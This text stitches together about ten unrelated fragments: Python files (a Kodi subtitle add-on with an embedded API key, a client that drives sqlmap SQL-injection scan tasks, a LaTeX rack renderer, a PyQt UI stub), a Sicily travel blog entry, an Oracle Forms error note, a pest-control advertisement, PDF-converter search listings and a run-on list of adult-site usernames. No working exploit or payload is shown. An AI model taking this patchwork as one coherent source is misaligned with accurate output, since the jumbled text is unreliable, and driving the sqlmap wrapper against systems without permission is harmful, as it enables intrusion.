stableTimestep(self, dt): dt = self.exchanger.stableTimestep(dt) return dt def endTimestep(self, steps, done): done = self.exchanger.endTimestep(steps,done) return done # version __id__ = "$Id: SnacCoupler.py 1902 2004-08-19 18:23:55Z EunseoChoi $" # End of file
Today we rise at 4:00am to make the big jump to Sicily. We have mapped everything out carefully, getting lots of advice from our hosts at the hotel on how best to reach Fiumicino. We’re sad to leave Hotel Castel Gandolfo, especially during the wee hours of the morning when there is no one around. We make our way up the stone streets one last time and remember how welcoming this place has been. It would be nice to come back again some day. In the moonlit early morning, it’s easy to find the Via Appia leading into Rome, and then the southern leg of the GRA (Grande Raccordo Anulare), the usually hectic beltway that encircles the city. For a 7:05am flight, it soon becomes apparent that we are on the early side, and that’s good. Doing Italy the way we do, we are often traveling at ridiculous hours, and this is no exception. We leave the car at the Europcar off-hours drop off near the airport, and that goes smoothly. We then walk across the bridge into the large hall that includes all of the airline ticketing desks. They are just opening up and we get right through, except for the detour to another desk nearby to pay for our extra few kilos of weight. Today we will be flying Blue Express at a low fare, so we aren’t expecting much in the way of frills. When we arrive in Catania, there is an endless wait for our bags, and this usually brings fears of lost luggage. In this case, our fears are justified. The bags don’t make it! The baggage desk staff are competent and professional, but the system supporting them is hardly that. There is no way of knowing where they are, so we have to take it on faith that they’ll arrive on the next flight from Rome, a mere three hours from now. The clerk sells us on the idea of visiting downtown Catania for a few hours, a town we were not planning to visit. It’s a warm and sunny autumn day, so we locate the bus stop and take the ride into town. The view from the bus makes it all worthwhile. This is our first view of Sicily, and both the people and the scenery are fascinating. Not particularly beautiful near the airport, but as we near the town center, we begin to see the style of the architecture and get a feel for what it is like to be in Sicily. It’s Italy, but clearly it’s different. The heart of Catania is the area surrounding Piazza del Duomo. As you pass the group of local men making spirited conversation by the fountain, you catch begin to catch a whiff of the famous fish market, which is just off the square. We stroll through the crowded and hectic streets of the fish market and listen to the vendors shouting out loud about their wares, which include all manner of squid, octopus, eels and assorted types of fish. Sicily is famous for these markets, and they are as colorful and exciting as anything you can see in Italy. Here is a little taste of it, courtesy of marciajeans on YouTube. We stop for a quick slice of pizza and Fanta on the edge of the piazza, which proves to be one of the less memorable meals of our stay. Then we find our way back to the bus stop and take the return trip to the airport. Thankfully, our bags have arrived safely from Rome. We check out our rental car, and we are on our way. Our first look at Sicily has been most rewarding. This entry was posted in 30 Days on the Road in Italy, Italy up close, Sicily and tagged sicily catania blue express rome. Bookmark the permalink.
# -*- coding: utf-8 -*- import xbmc, xbmcaddon, xbmcgui, xbmcplugin, xbmcvfs import os, sys, re, string, urllib, urllib2, socket, unicodedata, shutil, time, platform import simplejson as json __addon__ = xbmcaddon.Addon() __addonid__ = __addon__.getAddonInfo('id') __addonname__ = __addon__.getAddonInfo('name') __addonversion__ = __addon__.getAddonInfo('version') __icon__ = __addon__.getAddonInfo('icon') __language__ = __addon__.getLocalizedString __platform__ = platform.system() + " " + platform.release() __profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8") __temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode("utf-8") sys.path.append( os.path.join( __profile__, "lib") ) self_host = "http://api.betaseries.com" self_apikey = "5a85a0adc953" self_apiver = "2.4" self_team_pattern = re.compile(r".*-([^-]+)$") self_notify = __addon__.getSetting('notify') == 'true' TEAMS = ( # SD[0] HD[1] ("lol|sys|dim", "dimension"), ("asap|xii|fqm|imm", "immerse|orenji"), ("excellence", "remarkable"), ("2hd|xor", "ctu"), ("tla", "bia")) LANGUAGES = ( # [0] [1] ("br", "pt"), ("gr", "el")) def other_team(team, team_from, team_to): # get other team using TEAMS table for x in TEAMS: if len(re.findall(x[team_from], team)) > 0: return x[team_to] # return team if not found log("other team not found") return team def normalize_lang(lang, lang_from, lang_to): # normalize lang using LANGUAGES table for x in LANGUAGES: if len(re.findall(x[lang_from], lang)) > 0: return x[lang_to] # return lang if not found return lang def normalize_string(txt): return unicodedata.normalize('NFKD', txt).encode('ascii', 'ignore') def log(txt, level=xbmc.LOGDEBUG): message = u'%s: %s' % (__addonid__, txt) xbmc.log(msg=message, level=level) def set_user_agent(): json_query = json.loads(xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "method": "Application.GetProperties", "params": {"properties": ["version", "name"]}, "id": 1 }')) try: major = str(json_query['result']['version']['major']) minor = str(json_query['result']['version']['minor']) name = "Kodi" if int(major) >= 14 else "XBMC" version = "%s %s.%s" % (name, major, minor) except: log("could not get app version") version = "XBMC" return "Mozilla/5.0 (compatible; " + __platform__ + "; " + version + "; " + __addonid__ + "/" + __addonversion__ + ")" def get_params(string=""): param=[] if string == "": paramstring=sys.argv[2] else: paramstring=string if len(paramstring)>=2: params=paramstring cleanedparams=params.replace('?','') if (params[len(params)-1]=='/'): params=params[0:len(params)-2] pairsofparams=cleanedparams.split('&') param={} for i in range(len(pairsofparams)): splitparams={} splitparams=pairsofparams[i].split('=') if (len(splitparams))==2: param[splitparams[0]]=splitparams[1] return param def get_url(url, referer=self_host): req_headers = { 'User-Agent': self_user_agent, 'Cache-Control': 'no-store, no-cache, must-revalidate', 'Pragma': 'no-cache', 'Referer': referer} request = urllib2.Request(url, headers=req_headers) opener = urllib2.build_opener() try: response = opener.open(request) contents = response.read() return contents except urllib2.HTTPError, e: log('HTTPError = ' + str(e.code), xbmc.LOGERROR) if e.code == 400: return False except urllib2.URLError, e: log('URLError = ' + str(e.reason), xbmc.LOGERROR) except Exception: import traceback log('generic exception: ' + traceback.format_exc(), xbmc.LOGERROR) # when error occured if self_notify: xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30008), 750, __icon__)).encode('utf-8', 'ignore')) return False def download_subtitle(url, ext, subversion, referer): # name of temp file for download local_tmp_file = os.path.join(__temp__, "betaseries." + ext) log("downloading url : %s" % (url)) socket.setdefaulttimeout(15) content = get_url(url, referer) if content: local_file_handle = open(local_tmp_file, "w" + "b") local_file_handle.write(content) local_file_handle.close() log("file extension is : %s" % (ext)) if ext in ['zip','rar']: files = os.listdir(__temp__) init_filecount = len(files) log("number of files : %s" % (init_filecount)) filecount = init_filecount log("extracting zip file : %s" % (local_tmp_file)) xbmc.executebuiltin("XBMC.Extract(" + local_tmp_file + "," + __temp__ +")") waittime = 0 while (filecount == init_filecount) and (waittime < 20): # nothing yet extracted time.sleep(1) # wait 1 second to let the builtin function 'XBMC.extract' unpack files = os.listdir(__temp__) filecount = len(files) waittime = waittime + 1 # if max waittime reached if waittime == 20: log("error unpacking files in : %s" % (__temp__)) else: log("unpacked files in : %s" % (__temp__)) time.sleep(1) files = os.listdir(__temp__) log("looking for %s" % (subversion)) for filename in files: log("checking file %s" % (filename)) if normalize_string(filename) == subversion: filepath = os.path.normpath(os.path.join(__temp__, filename)) log("selected file : %s" % (filename)) return filepath else: log("selected file : %s" % (subversion)) return local_tmp_file else: return False def search_subtitles(search): subtitles = [] log("entering search_subtitles()") if search['mode'] == "movie": log("movies not supported!") return False # get video file name dirsync = __addon__.getSetting('dirsync') == 'true' if dirsync: # get directory name as filename filename = os.path.basename(os.path.dirname(search['path'])).lower() else: # or use filename filename = os.path.basename(search['path']).lower() # and remove file extension filename = re.sub(r"\.[^.]+$", "", filename) filename = normalize_string(filename) log("after filename = %s" % (filename)) # if file, check if valid tvshow if search['mode'] == "file" and not re.search(r"(?i)(s[0-9]+e[0-9]+|[0-9]+x?[0-9]{2,})", filename): log("not a tvshow or badly named!") return False # get subtitle team subteams = [] subteams.append(filename.replace(".","-")) if len(subteams[0]) > 0: # get team name (everything after "-") subteams[0] = self_team_pattern.match("-" + subteams[0]).groups()[0].lower() # find equivalent teams, if any tmp = other_team(subteams[0],0,1) if len(tmp) > 0 and tmp != subteams[0]: subteams.append(tmp) # find other equivalent teams, if any tmp = other_team(subteams[0],1,0) if len(tmp) > 0 and tmp != subteams[0]: subteams.append(tmp) log("after subteams = %s" % (subteams)) # configure socket socket.setdefaulttimeout(10) # define default url to get betaseries episode id from filename episodeurl = "%s/episodes/scraper?file=%s&key=%s&v=%s" % (self_host, urllib.quote(filename), self_apikey, self_apiver) # check video type if search['mode'] == "tvshow": # get playerid json_query = '{"jsonrpc": "2.0", "method": "Player.GetActivePlayers", "id": 1}' playerid = json.loads(xbmc.executeJSONRPC(json_query))['result'][0]['playerid'] # get tvshowid json_query = '{"jsonrpc": "2.0", "method": "Player.GetItem", "params": {"playerid": ' + str(playerid) + ', "properties": ["tvshowid"]}, "id": 1}' tvshowid = json.loads(xbmc.executeJSONRPC (json_query))['result']['item']['tvshowid'] # check result if tvshowid > 0: # get tvdbid json_query = '{"jsonrpc": "2.0", "method": "VideoLibrary.GetTVShowDetails", "params": {"tvshowid": ' + str(tvshowid) + ', "properties": ["imdbnumber"]}, "id": 1}' tvdbid_result = json.loads(xbmc.executeJSONRPC(json_query)) # if we have tvdbid, work with ids if 'result' in tvdbid_result: # get betaseries show id from tvdbid tvdbid = tvdbid_result['result']['tvshowdetails']['imdbnumber'] showurl = "%s/shows/display?thetvdb_id=%s&key=%s&v=%s" % (self_host, tvdbid, self_apikey, self_apiver) try: showid = json.loads(get_url(showurl))["show"]["id"] except: log("could not parse data or fetch url for showid, cannot continue") return False log("after showid = %s" % (showid)) # then get betaseries episode id episodeurl = "%s/episodes/search?show_id=%s&number=S%#02dE%#02d&key=%s&v=%s" % (self_host, showid, int(search['season']), int(search['episode']), self_apikey, self_apiver) try: episodeid = json.loads(get_url(episodeurl))["episode"]["id"] log("after episodeid = %s" % (episodeid)) except: log("error or episode not found!") return False # then get subtitles list listurl = "%s/subtitles/episode?id=%s&key=%s&v=%s" % (self_host, episodeid, self_apikey, self_apiver) try: data = json.loads(get_url(listurl))["subtitles"] except: log("could not parse data or fetch url, cannot continue") return False # for each release version log("parsing data after urlopen") log("--------------------------") for subtitle in data: # get filename subfile = normalize_string(subtitle["file"]) log("after subfile = %s" % (subfile)) # get file extension ext = string.split(subfile,'.')[-1] # get season number from data season = int(subtitle["episode"]["season"]) log("after season = %s" % (season)) # get episode number from data episode = int(subtitle["episode"]["episode"]) log("after episode = %s" % (episode)) # get names of files contained in zip file, if any if len(subtitle["content"]) > 0: content = subtitle["content"] # or put filename in content else: content = [subtitle["file"]] log("after content = %s" % (content)) # for each file in content for subversion in content: log("-------------") # subtitle file name subversion = normalize_string(subversion) log("after subversion = %s" % (subversion)) # subtitle download url link = subtitle["url"] log("after link = %s" % (link)) try: # normalize lang lang2 = { "VO": "en", "VF": "fr", "VOVF": "xx", }[subtitle["language"]] except: log("unsupported language") continue # get note if 0 <= int(subtitle["quality"]) <= 5: note = int(subtitle["quality"]) else: note = 0 log("after note = %s" % (note)) # check if file is a subtitle if not len(re.findall(r"(?i)\.(srt|ssa|ass|sub)$", subversion)): log("not a subtitle : %s" % (subversion)) continue # if from a zip file if len(content) > 1: # check if file is for correct season and episode search_string = r"(?i)(s%#02de%#02d|%d%#02d|%dx%#02d)" % (season, episode, season, episode, season, episode) if not re.search(search_string, subversion): log("file not matching episode : %s" % (subversion)) continue # get subtitle file lang langs = re.search(r"(?i)[ _.-](english|french|eng|fre|en|fr|vo|vf)[ _.-]", subversion) # or get zip file lang if langs == None: langs = lang2 else: langs = langs.group(1).lower() log("after zip langs = %s" % (lang2)) try: lang2 = { "french": 'fr', "english": 'en', "fre": 'fr', "eng": 'en', "fr": 'fr', "en": 'en', "vf": 'fr', "vo": 'en' }[langs] except: log("unsupported language") continue log("after zip lang2 = %s" % (lang2)) try: # get full language name lang = xbmc.convertLanguage(lang2, xbmc.ENGLISH_NAME) except: log("unsupported language") continue # if lang = user gui language if lang == search['uilang']: # put this file on top uilang = True else: uilang = False log("after lang = %s, lang2 = %s" % (lang, lang2)) # check sync sync = False team = False for (key, subteam) in enumerate(subteams): # if team corresponds if len(subteam) > 0 and len(re.findall(r"(?i)[ _.-](" + subteam + ")[ _.-]", subversion)) > 0: # set sync tag sync = True # if videofile team matches subfile team if key == 0: team = True log("after sync = %s" % (sync)) # check if this is for hearing impaired if len(re.findall(r"(?i)[ _.-](CC|HI)[ _.-]", subversion)) > 0: cc = True else: cc = False log("after cc = %s" % (cc)) # if language allowed by user if lang2 in search['langs']: # add subtitle to list subtitles.append({'uilang':uilang,'ext':ext,'filename':subversion,'link':link,'lang':lang,'lang2':lang2,"cc":cc,"sync":sync,"note":note,"team":team}) log("subtitle added : %s" % (subversion)) log("--------------------------") if subtitles: # get settings for sorting uifirst = __addon__.getSetting('uifirst') == 'true' ccfirst = __addon__.getSetting('ccfirst') == 'true' # sort accordingly log("sorting by filename asc") subtitles.sort(key=lambda x: [x['filename']]) if not ccfirst: log("sorting by cc last") subtitles.sort(key=lambda x: [x['cc']]) log("sorting by note best") subtitles.sort(key=lambda x: [x['note']], reverse=True) log("sorting by lang asc") subtitles.sort(key=lambda x: [x['lang']]) if ccfirst: log("sorting by cc first") subtitles.sort(key=lambda x: [not x['cc']]) if uifirst: log("sorting by uilang first") subtitles.sort(key=lambda x: [not x['uilang']]) log("sorting by sync first") subtitles.sort(key=lambda x: [not x['sync']]) log("sorting by team first") subtitles.sort(key=lambda x: [not x['team']]) log("sorted subtitles = %s" % (subtitles)) # for each subtitle for item in subtitles: # xbmc list item format listitem = xbmcgui.ListItem(label=item["lang"], label2=item["filename"], iconImage=str(item["note"]), thumbnailImage=item["lang2"]) # setting sync / CC tag listitem.setProperty("sync", 'true' if item["sync"] else 'false') listitem.setProperty("hearing_imp", 'true' if item["cc"] else 'false') # adding item to GUI list url = "plugin://%s/?action=download&link=%s&ext=%s&filename=%s" % (__addonid__, item["link"], item["ext"], urllib.quote(item["filename"])) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False) else: if self_notify: xbmc.executebuiltin((u'Notification(%s,%s,%s,%s)' % (__addonname__, __language__(30010), 750, __icon__)).encode('utf-8', 'ignore')) log("nothing found") log("end of search_subtitles()") # start of script # clean up if os.path.exists(__temp__): log("deleting temp tree...") shutil.rmtree(__temp__.encode("utf-8","ignore")) log("recreating temp dir...") xbmcvfs.mkdirs(__temp__) # define user-agent self_user_agent = set_user_agent() # get params params = get_params() # called when user is searching for subtitles if params['action'] == 'search': item = {} item['tvshow'] = xbmc.getInfoLabel("VideoPlayer.TVshowtitle").decode("utf-8") item['year'] = xbmc.getInfoLabel("VideoPlayer.Year") item['season'] = xbmc.getInfoLabel("VideoPlayer.Season") item['episode'] = xbmc.getInfoLabel("VideoPlayer.Episode") item['path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8')) item['uilang'] = xbmc.getLanguage() item['langs'] = [] # get user preferred languages for subtitles for lang in urllib.unquote(params['languages']).decode('utf-8').split(","): item['langs'].append(xbmc.convertLanguage(lang, xbmc.ISO_639_1)) # remove rar:// or stack:// if ( item['path'].find("rar://") > -1 ): item['path'] = os.path.dirname(item['path'][6:]) elif ( item['path'].find("stack://") > -1 ): stackPath = item['path'].split(" , ") item['path'] = stackPath[0][8:] # show item data in debug log log("after item = %s" % (item)) # find playing mode if len(item['tvshow']) > 0: item['mode'] = "tvshow" elif item['year'] != "": item['mode'] = "movie" else: item['mode'] = "file" # search for subtitles search_subtitles(item) # called when user clicks on a subtitle elif params['action'] == 'download': # download link sub = download_subtitle(params["link"], params["ext"], urllib.unquote(params["filename"]), self_host) if sub: # xbmc handles moving and using the subtitle listitem = xbmcgui.ListItem(label=sub) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False) xbmcplugin.endOfDirectory(int(sys.argv[1]))
AmeliHottie bombasexxx jasmin. TremblingSakura. SamantaWhite. TigROCK. TicoscalientesROBSTEELXLxlightBrunetteGATICARIKASEXY01 .stefanomoralesxOnlyAnal4UxXLissajasonTarajiQueen .IamNextDoorWendyMilnmasterlogisaSEXYh0tSARAH .TylerAndTonySEXYh0tSARAHFantasticLove1LaceyBreeze .HotInsuMaiaBrunniAnalxpassionMaryLoveQT .davetest4126LauraDivineSinnerburningxOnlyAnal4UxX .OneSexxyCouplemjessejass2HugePhilCockTicoscalientes .EnigmaAnn1MaryHotBBlanalucilleTSMiaIsabella25 .2HugePhilCockNaugtyXXXCouple2HugePhilCockxOnlyAnal4UxX .JhonEiderMaggiHotsharitaxAngeloWhite .AnalxpassionXXAnnaBelleXXXMatureSandraAmandaLowe . ScarlettRougeeKoleenSamantaWhiteLissajason .FreshAsiaXXAnnaBelleXXGrannyNeeedsSinnerburning .GATICARIKASEXY01MaggiHotAnalxpassionKRISTHIANHOT .stefanomoralesLoraAngel4u666pussycatKRISTHIANHOT .xOnlyAnal4UxXJonnyStarkGrannyNeeedsSinnerburning .xOnlyAnal4UxXbabyrihKatherineJones84Lisangel1974 .WalletQueeennnXMatureSandraAnalxpassionOneSexxyCouplem .TylerAndTonyAngeloWhiteGDaNaFAngeloWhite .BettyJoonesAlisonSexyBlondlanalucilleSelenaJones .TastyVivianSEXYh0tSARAHMissLilyRoseCuteLittleMonkey .babyrihBettyJoonesLissajasonTylerWood .
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ ----------------------------------------------------- @post('/scan/<taskid>/start') @get('/scan/<taskid>/stop') @get('/scan/<taskid>/kill') @get('/scan/<taskid>/status') @get('/scan/<taskid>/data') ----------------------------------------------------- """ import time from urllib.parse import urljoin import requests from .logs import get_logger from .exceptions import TaskStatusError, TaskResultError, TaskLogError logger = get_logger('sqlmapcli') class TaskStatus(object): """ Task status constant """ READY = 'not running' RUNNING = 'running' FINISHED = 'terminated' class Task(object): def __init__(self, id, options, addr): """ Create a task object. Args: id (str): task id from remote sqlmapapi server. options (dict): options used to run task, see `curl http://<host>:<port>/option/<taskid>/list`. addr (str): remote sqlmapapi server address. """ self.id = id self.addr = addr self.options = options or {} # always store url target in task object self.url = self.options.get('url', None) def __str__(self): return '<Task#%s>' % self.id def __repr__(self): return str(self) def _request(self, path, method='GET'): """ Used to request remote sqlmapapi server. Args: path (str): url path for request. method (str): GET or POST for different request. Returns: dict if successful, None otherwirse. """ try: url, method = urljoin(self.addr, path), method.upper() if method == 'GET': r = requests.get(url).json() elif method == 'POST': r = requests.post(url, json=self.options).json() except requests.RequestException as e: logger.error('Fail to %s %s: %s' % (method, path, e)) return None if r.get('success'): return r else: logger.error('Fail to %s %s: %s' % (method, path, r.get('message'))) # noqa return None def set_option(self, key, value): """ Set option for task. Options can be set when client create task, or call `set_option` after task is created but not start. Args: key (str): option name. value (str): option value. Returns: Task: for chained call, eg. `task.set_option(key, value).set_option(key, value)`. """ self.options[key] = value if key == 'url': self.url = value return self def get_option(self, key): """ Get task option. Args: key (str): option name. Returns: str: option value. """ return self.options.get(key) def update_options(self, options): """ Update some options at same time. Args: options (dict): options that to update. """ self.options.update(options) if 'url' in options: self.url = options.get('url') def list_options(self): """ Get options that manually set. Returns: dict: options that user set. """ return self.options def start(self, url=None, options=None): """ Task start to run. Args: url (str): target url to scan by sqlmap, this is a shorthand for set option with key `url` options (Optional[dict]): shorthand, set options for task, alternative to `set_option` or `update_options` or set options when create task. Returns: str: engineid, maybe useful in future. """ if options: self.update_options(options) if url: self.url = url self.set_option('url', url) r = self._request('/scan/%s/start' % self.id, 'POST') self.engineid = r.get("engineid") if r else None return self.engineid def stop(self): """ Stop running task. Returns: bool: True if stop successfully, False otherwise. """ r = self._request('/scan/%s/stop' % self.id) return bool(r) def kill(self): """ Kill running task unconditionally. Returns: bool: True if Kill successfully, False otherwise. """ r = self._request('/scan/%s/kill' % self.id) return bool(r) def status(self): """ Task currenty status, ready, running or finished. Returns: dict: include status and retcode. Raises: TaskStatusError: status exception. """ r = self._request('/scan/%s/status' % self.id) if r: status, retcode = r.get('status'), r.get('returncode') return {'status': status, 'retcode': retcode} else: raise TaskStatusError("Can't get status") @property def ready(self): """ shorthand for task status. Returns: bool: True if task is created but not start, False otherwise. """ try: r = self.status() return r.get('status') == TaskStatus.READY except TaskStatusError as e: logger.error('Fail to GET task<%s> status: %s', self.id, e) return False @property def running(self): """ shorthand for task status. Returns: bool: True if task start but not finished, False otherwise. """ try: r = self.status() return r.get('status') == TaskStatus.RUNNING except TaskStatusError as e: logger.error('Fail to GET task<%s> status: %s', self.id, e) return False @property def finished(self): """ shorthand for task status. Returns: bool: True if task is finished, False otherwise. """ try: r = self.status() return r.get('status') == TaskStatus.FINISHED except TaskStatusError as e: logger.error('Fail to GET task<%s> status: %s', self.id, e) return False def get_result(self): """ Get task result. Returns: dict: task data. Raises: TaskResultError: task result exception. """ r = self._request('/scan/%s/data' % self.id) if r: return r.get('data') else: raise TaskResultError("Can't get result") def get_log(self, start=None, end=None): """ Get task log. Args: start (int): start index of log list. end (int): end index of log list. Returns: dict: task log data. Raises: TaskLogError: task log exception. """ if start and end: r = self._request('/scan/%s/log/%s/%s' % (self.id, start, end)) else: r = self._request('/scan/%s/log' % self.id) if r: return r.get('log') else: raise TaskLogError("Can't get log") def run(self, url=None, options=None, interval=5): """ Shorthand for call `start`, `status` and `get_result` Args: url (str): target url to scan by sqlmap, this is a shorthand for set option with key `url` options (Optional[dict]): shorthand, set options for task, alternative to `set_option` or `update_options` or set options when create task. interval (int): interval time toquery task status, seconds default. Returns: dict if successfully, None otherwise. """ self.start(url, options) while self.running: time.sleep(interval) try: r = self.get_result() except TaskResultError as e: logger.error('Fail to GET task<%s> result: %s', self.id, e) return None return r
Error: "FRM-92101 , found the following error in FormsGroup.0.stdout - Forms session <84> aborted: unable to communicate with runtime process." But this cannot be used as a permanent fix, because after this change all the connections coming to forms will treated as if they are coming from the IP address 100.100.100.100. So current workaround can be used as temporary fix until the issue is permenantly fixed by applying the required patch.
#!/usr/bin/python import rack import string class RackView: def __init__(self, name): self.options = [] self.name = name # output variable self.o = [] self.notes = [] self.images = [] self.checklist = [] def render(self, thing): """ @param thing: the rack or rackarray to be drawn """ self.o.append("\\section{%s}" % (thing._name,)) self.o.append("\\begin{multicols}{2}") self.o.append("\\includegraphics[height=\\textheight]{%s}" % (string.split(self.name, '.')[0],)) self.o.append("\\columnbreak") # requirements #self.o.append("\\\\Requirements") #self.o.append("\\begin{itemize}") #for (k, v) in [("network port", thing.network), # ("power outlet", thing.power), # ]: # self.o.append("\item %s %s%s" % (v, k, ["s", ""][v == 1])) #self.o.append("\\end{itemize}") # recurse for y in range(thing.units-1, -1, -1): if thing._elements.has_key(y): e = thing._elements[y] if e is not None: e.visit(self) # notes #self.o.append("\\subsubsection{Notes}") #self.o.append("{\\small") #if len(self.notes) > 0: # self.o.append("\\begin{description}") # self.o += self.notes # self.o.append("\\end{description}") #self.o.append("}%end small") # checklist if len(self.checklist) > 0: self.o.append("\\begin{center}") self.o.append("{\\footnotesize") self.o.append("\\begin{tabular}{r|c|c|c|c|c}") self.o.append("&racked&net&pow&on&servs\\\\") self.o.append("\\hline") self.o += self.checklist self.o.append("\\end{tabular}") self.o.append("}%end footnotesize") self.o.append("\\end{center}") # images self.o.append("\\begin{center}") self.o += self.images self.o.append("\\end{center}") self.o.append("\\end{multicols}") # spit out return string.join(self.o, "\n") def visitRackElement(self, e): if e.image != "": self.images.append("\\includegraphics[width=4cm]{%s}\\\\" % (e.image,)) if e.notes != "": self.notes.append("\\item[%s] %s" % (e.name, e.notes)) self.checklist.append("%s&&&&&\\\\\n\\hline" % (e.name,)) def visitCableManagement(self, cman): pass def visitRackmount(self, rm): return self.visitRackElement(rm) def visitSwitch(self, sw): return self.visitRackElement(sw) def visitAPC(self, apc): return self.visitRackElement(apc) def visitGap(self, gap): pass def visitShelf(self, shelf): l = len(self.images) for e in shelf._elements: e.visit(self) if len(self.images) > l: self.images.append("\\\\") def visitShelf1RU(self, shelf): return self.visitShelf(shelf) def visitShelf2U(self, shelf): return self.visitShelf(shelf) def visitShelf1a(self, shelf): return self.visitShelf(shelf) def visitBox(self, box): if box.image != "": self.images.append("\\includegraphics[width=%smm]{%s}" % (box.width/11,box.image)) if box.notes != "": self.notes.append("\\item[%s] %s" % (box._name, box.notes)) self.checklist.append("%s&&&&&\\\\\n\\hline" % (box._name,))
Looking for the best services for pest control Bellara? Fast Pest Control is the place you need to be. We have a team of experts working in the field for more than a decade, fighting with all types of pests. Whether you have crawling pest infestation or flying pest infestation, we can handle it all. Call now for the same day pest inspection! Why Fast Pest Control Bellara? Welcome to Fast Pest Control Bellara – your local pest control experts. We deliver exceptional pest eradication services to protect your homes in an innovative and safe manner across all the suburbs of Bellara We use effective and advanced pest control methods to create secure and comfortable environments for your homes and offices. Our modus operandi for removing pests ensures that your life gets freed from all kinds of unwanted pests and termites. We at Fast Pest Control do not believe in burning the hole in our customers’ pocket. Moreover, unlike other pest control firms in Bellara, we do not sacrifice on the quality of our pest control methods even after serving you on the reasonable prices. We use high-quality chemicals in our pest control treatments that do not cause any harm to your family and pets. Also, we revisit our place after a certain period of time to check if the services provided are effective or not. Our professionals also give free pest control advice and treatments to our clients. Call us for the free quotes today. Fast Pest Control Bellara provides affordable residential pest control services in all suburbs of Bellara. When you sell or buy a home, it is good to check for pests first. Most importantly, it is essential to get a termite inspection done. And we do it with one simple call! At Fast Pest Bellara, we have solution for each of the above pests.. One of the most common and yet the most dangerous crawling pests found in Bellara homes is cockroach. They contaminant surfaces and food through the disease-causing organisms that they carry. Cockroaches are also found in healthcare facilities, restaurants, and other food related properties. We at Fast Pest Control understand that rodent infestation in the home can be a dangerous situation. Your health and things and property are at stake. Thus, we offer effective services for rodent control Bellara. Fast Pest Control also offers pre-purchase pest inspection in Bellara at the most affordable prices. Pre-purchase pest inspection is the right way to make sure you are going to invest in the right property. This is one of the best aspects to consider while purchasing a house. The professional pest controllers we own are highly trained and experienced and know the best ways to bring you the best and satisfactory results. When you hire us for pest inspection services, we come fully prepared and if we find the pest infestation while inspection, we can also treat them on your demand. So, do not go any buying any property without complete investigation and inspection. Our huge range of pest control Bellara services also includes restaurant pest control. Being a restaurant owner, your customer’s health must be your top priority. Also, having regular pest control at your restaurant saves you from humiliation. As if any of your happy customers spot the pest wandering around the premises, then it can lead to a loss in your business as well reputation. Neither those customers will again return nor they will suggest your restaurant as a good place to eat. So, what are you still waiting for? Pick up your phone and call us for your pest control needs in Bellara. The professional team of our pest controllers is highly proactive and offer an array of pest control services in Bellara across all the suburbs including all the metro and remote areas. We reach your place the best time given by given by you. You only have to let us know about the type of pest and density of pest infestation in the house and we will come to your place with all the preparations. A few of the many service areas in Bellara include Caboolture, Blantyre, Toorbul, Milora, Ipswich, Toowoomba, Gold Coast, Caloundra, Sandgate, North Lakes, Sunshine Coast, Bellbird Park, Wellington Point, Northgate, Lamington and hundreds of other areas. Why let pests spoil your life when you can easily get rid of them by hiring the pest eradication experts? Call Fast Pest Control Bellara today and say bye to pests from your homes and offices forever. How You Attract Pests Into Your Home? Home Remedies For Flea Control. What all pest control services do you offer?
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file './client/widgets/status_bar.ui' # # Created: Thu Sep 17 23:50:20 2015 # by: PyQt4 UI code generator 4.9.1 # # WARNING! All changes made in this file will be lost! from PyQt4 import QtCore, QtGui try: _fromUtf8 = QtCore.QString.fromUtf8 except AttributeError: _fromUtf8 = lambda s: s class Ui_statusWidget(object): def setupUi(self, statusWidget): statusWidget.setObjectName(_fromUtf8("statusWidget")) statusWidget.resize(625, 39) self.horizontalLayout = QtGui.QHBoxLayout(statusWidget) self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout")) self.label_status = QtGui.QLabel(statusWidget) self.label_status.setMinimumSize(QtCore.QSize(441, 16)) self.label_status.setText(_fromUtf8("")) self.label_status.setObjectName(_fromUtf8("label_status")) self.horizontalLayout.addWidget(self.label_status) self.line = QtGui.QFrame(statusWidget) self.line.setFrameShape(QtGui.QFrame.VLine) self.line.setFrameShadow(QtGui.QFrame.Sunken) self.line.setObjectName(_fromUtf8("line")) self.horizontalLayout.addWidget(self.line) self.label_record = QtGui.QLabel(statusWidget) self.label_record.setMinimumSize(QtCore.QSize(151, 21)) self.label_record.setMaximumSize(QtCore.QSize(151, 16777215)) self.label_record.setText(_fromUtf8("")) self.label_record.setObjectName(_fromUtf8("label_record")) self.horizontalLayout.addWidget(self.label_record) self.retranslateUi(statusWidget) QtCore.QMetaObject.connectSlotsByName(statusWidget) def retranslateUi(self, statusWidget): statusWidget.setWindowTitle(QtGui.QApplication.translate("statusWidget", "Form", None, QtGui.QApplication.UnicodeUTF8))
PDF Converter - Convert PDF to Word, Excel | Able2Extract™ www.investintech.com/ Convert PDF to Word, Excel, PowerPoint and other editable formats. Quickly on the spot. FREE download! Building Trusted PDF Solutions for 15 Years. Free PDF to Word Free Download for Windows 10, 7, 8/8.1 (64 bit/32 fm-pdf.com/ Free PDF to Word is a product developed by Free PDF Solutions. This site is not directly affiliated with Free PDF Solutions. All trademarks, registered trademarks . Export PDF to Word or Excel online | Adobe Export PDF free-print-to-pdf.en.softonic.com/ Adobe Export PDF makes it easy to convert PDFs to Microsoft Word or Excel for editing. Get the complete PDF solution for working anywhere. US$ 14 . 99 /mo. PDF-related Freeware - Whirlpool www.gotomaxx.com/pdfmailer/207/pdfmailer-free?c=1193 Free software to convert pdf files to Word format: Windows With a PDF file size optimisation, Elfima Notepad is the most efficient solution to create quickly and . PDF to Word Converter - 100% Free - PDF Online portableapps.com/node/20402 Best, online Free PDF to Word Converter. I can't speak for anyone else nor their needs, but PDF to Word Online did exactly what I thought Custom Solutions. PDFtoX Software - Free PDF Converter - Free PDF to Word www.soliddocuments.com/ Our free PDF converter software enables you to convert PDF to Word Excel HTML All-in-one PDF solutions that converts PDF files to editable Microsoft Word, . PDF to Word Pro | Convert PDF to Word online free OCR https://www.linkedin.com//20141016073919-153194857-online-free-pdf-to-word-converter-convert-pdf-to-word-for-free Convert PDF to Word online. 